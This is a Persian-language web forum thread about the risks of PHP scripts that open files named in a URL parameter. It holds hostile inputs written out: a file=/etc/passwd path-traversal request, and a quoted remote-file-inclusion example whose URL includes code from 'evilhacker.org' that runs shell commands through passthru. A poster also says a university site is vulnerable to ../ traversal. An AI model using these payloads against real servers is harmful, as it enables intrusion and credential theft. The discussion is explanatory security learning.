چرا می گن باز کردن فایل ها بوسیله متغییر خطرناکه؟(مرور فایل های رو وب سرور را کنار بگذاریم)
مثلا ممکن است چیزی مثل این داشته باشیم
www.example.com/file.php?file=thefile
اگر اجازه مرور وب سرور از این اسکریپت گرفته بشه آیا می تونه خطرناک باشه
(چنکه تنها می تونه فایل های خارجی را باز کنه مثلا یاهوو رو ببینه)
Artists use lies to tell the truth while politicians use them to cover the truth up
چون اگر بد برنامه نویسی بشه و امنیت سرور کمی کم باشه باعث ایجاد مشکلات زیادی می شه، مثلا:
www.example.com/file.php?file=/etc/passwd
این خط می تونه فایل پسورد های لینوکس رو در بیاره و نشون بده یا ....
به هر حال، از چندین راه می شه جلوی این عملیات رو گرفت. اما اگه یادت باشه، من گفتم اگر بد برنامه نویسی بشه. (چیزی شبیه register_globals در PHP که ذاتا هیچ خطری نداره ولی کافیه شرایط مساعد باشه و برنامه نویس کمی گاگول. البته خطر register_globals از این مشکلی که شما مطرح کردید به مراتب کمتره)
ایمیل من
سایت من
عضویت در جامعهی اهدای عضو
Direct PGP key: http://tinyurl.com/66q5cy
PGP key server: keyserver.ubuntu.com
PGP name to search: omidmottaghi
گفتم جز ایناگر اجازه مرور وب سرور از این اسکریپت گرفته بشه آیا می تونه خطرناک باشه
Artists use lies to tell the truth while politicians use them to cover the truth up
من مشکل دیگه ای به ذهنم نمی رسه.چون اگر بد برنامه نویسی بشه و امنیت سرور کمی کم باشه باعث ایجاد مشکلات زیادی می ش
ایمیل من
سایت من
Direct PGP key: http://tinyurl.com/66q5cy
PGP key server: keyserver.ubuntu.com
PGP name to search: omidmottaghi
In this case, every answer was negative. Time to play! Of course, it is now possible to read all the files the httpd user has read access for. But what is even more exciting is the fact that the include() function is used to include the HTML file. Consider this:
http://example.com/page.php?i=http://evilhacker.org/exec.html
Where exec.html contains a couple of lines of code:
<?php
passthru ('id');
passthru ('ls -al /etc');
passthru ('ping -c 1 evilhaxor.org');
passthru ('echo You have been hax0red | mail root');
?>
http://www.zend.com/zend/art/art-oertli.php
منظورم چیزی که در قسمت مربوطه در این مقاله گفته شده هر چی فکر می کنم می بینم باز شدن یک فایل خارجی نباید تاثیری داشته باشه
Artists use lies to tell the truth while politicians use them to cover the truth up
نگاه کن، شاید اینطور روش های هک (دسترسی به سرور) رو بشه به دو دستهء راه دور و محلی تقسیم کرد.
اگر دسترسی محلی با زبونی مثل PHP ممکن باشه، با این روشی که شما می گی هم می شه به سرور دسترسی پیدا کرد (البته قطعا باید این فایل رو سرور نصب باشه) این یعنی همون امنیت پایین که خودتون هم گفتید.
در غیر این صورت مشکلی نیست :) و سر جناب هکر به سنگ می خوره.
موفق باشید، امید
ایمیل من
سایت من
Direct PGP key: http://tinyurl.com/66q5cy
PGP key server: keyserver.ubuntu.com
PGP name to search: omidmottaghi
سایت یکی از دانشگاه ها که با پی اچ پی نوشته شده به علت چک نکردن متغییر های ارسالی دچار همین مشکل هستش و میتوان با چند تا /../../.. به عقب و یک /etc/passwd به یه جاهای خوبی رسید و ...
هه هه هه، با شناختی که ازت دارم، فکر می کنم بدونم کدوم دانشگاه رو می گی :)نوشته شده توسط jirjirakk
ایمیل من
سایت من
Direct PGP key: http://tinyurl.com/66q5cy
PGP key server: keyserver.ubuntu.com
PGP name to search: omidmottaghi
نچ (:D) یکی از دانشگاه های طرف های خودمونه اما نه اون یکی که تو فکر میکنی :P (دانشگاه آزاد نیستش)
اون ها اومدن یک صفحه اصلی طراحی کردن و با پاس دادن دو متغییر یکی برای صفحه اصلی و دیگری برای منوی سمت چپشون که توی این صفحه اصلی میاد و این دو تا فایل و که به عنوان پارامتر پاس میده باز میکنه و ...
و جالبناک ترش اینه که این سایت توسط 3 شایدم 4 تا از اساتید لیسانس و فوق لیسانس همون دانشگاه طراحی شده
در میخانه را بگشا که ار خانقه نگشود********** گرت باور بود یا نه سخن این بود و ما گفتیمو جالبناک ترش اینه که این سایت توسط 3 شایدم 4 تا از اساتید لیسانس و فوق لیسانس همون دانشگاه طراحی شده
حالا کسی چیز دیگه ای به نظرش نمی رسه؟
Artists use lies to tell the truth while politicians use them to cover the truth up
قوانین ایجاد تاپیک در تالار
پاسخ با نقل قول